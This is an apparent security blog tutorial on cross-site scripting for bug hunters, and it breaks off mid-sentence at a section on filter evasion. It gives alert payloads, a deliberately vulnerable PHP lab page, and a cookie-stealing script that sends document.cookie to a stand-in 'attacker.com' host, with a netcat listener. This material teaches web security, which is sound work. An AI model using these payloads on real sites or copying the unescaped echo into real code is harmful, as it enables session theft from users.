Cross Site Scripting (XSS) Unleashed: The Silent Web Killer That Every Bug Hunter Must Master + Video

Listen to this Post

Featured Image

Introduction:

Cross Site Scripting (XSS) remains one of the most pervasive web vulnerabilities, allowing attackers to inject malicious client‑side scripts into trusted websites. When unsanitized user input is echoed back to a browser, an attacker can hijack sessions, deface pages, or redirect victims to phishing sites. Mastering XSS is non‑negotiable for any aspiring bug bounty hunter or application security professional.

Learning Objectives:

  • Distinguish between Reflected, Stored, and DOM‑based XSS with real‑world exploit scenarios.
  • Build a local vulnerable lab to safely test manual and automated XSS payloads.
  • Implement defensive coding techniques, Content Security Policies (CSP), and evasion countermeasures.

You Should Know:

  1. Anatomy of an XSS Attack: How a Single Script Can Hijack a Session
    This section explains the core mechanism of reflected XSS. A vulnerable web page takes a parameter (e.g., search query) and prints it directly into the HTML response without encoding. An attacker crafts a malicious link containing JavaScript; when a victim clicks it, the script executes in their browser.

Step‑by‑step guide:

  • Identify a reflection point: Use a simple payload like `test123` and look for its presence in the source code.
  • Inject the classic proof‑of‑concept: <script>alert('XSS')</script>.
  • Encode the payload for URL transmission: %3Cscript%3Ealert(%27XSS%27)%3C/script%3E.
  • Send the attack via curl (Linux/macOS):
    curl "http://vulnerable-site.com/search?q=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
    
  • On Windows (PowerShell):
    Invoke-WebRequest -Uri "http://vulnerable-site.com/search?q=%3Cscript%3Ealert('XSS')%3C/script%3E"
    
  • Observe the alert box; if triggered, the site is vulnerable.
  1. Building Your XSS Lab: Setting Up a Safe Environment
    Never test on live sites without permission. Use a local virtual machine or Docker to host a deliberately vulnerable web app.

Step‑by‑step guide:

  • On Linux (Ubuntu/Debian):
    sudo apt update && sudo apt install apache2 php -y
    sudo systemctl start apache2
    echo '<?php echo "Search results for: " . $_GET["q"]; ?>' | sudo tee /var/www/html/xss_test.php
    
  • On Windows (using XAMPP):
  • Download and install XAMPP, start Apache.
  • Navigate to `C:\xampp\htdocs\` and create `xss_test.php` with the same PHP code.
  • Access the vulnerable script: http://localhost/xss_test.php?q=<script>alert(1)</script>.
  • To simulate a stored XSS, create a simple comment form that saves input to a text file and later displays it without sanitization.

3. Advanced Payloads: From Alert to Cookie Stealer

Moving beyond alerts, a real attacker steals session cookies to impersonate victims.

Step‑by‑step guide:

  • Craft a payload that extracts `document.cookie` and exfiltrates it to an attacker‑controlled server:
    <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
    
  • Set up a simple listener on your attack machine (Linux/macOS):
    python3 -m http.server 8080
    
  • On Windows (PowerShell, Python required):
    python -m http.server 8080
    
  • Alternatively, use netcat (Linux):
    nc -lvnp 8080
    
  • When the victim executes the payload, the cookie appears in the listener’s logs. For HTTPS exfiltration, use a tool like `ngrok` to expose a local server.
  1. Bypassing Filters: Evasion Techniques Every Red Teamer Needs
    Many applications filter `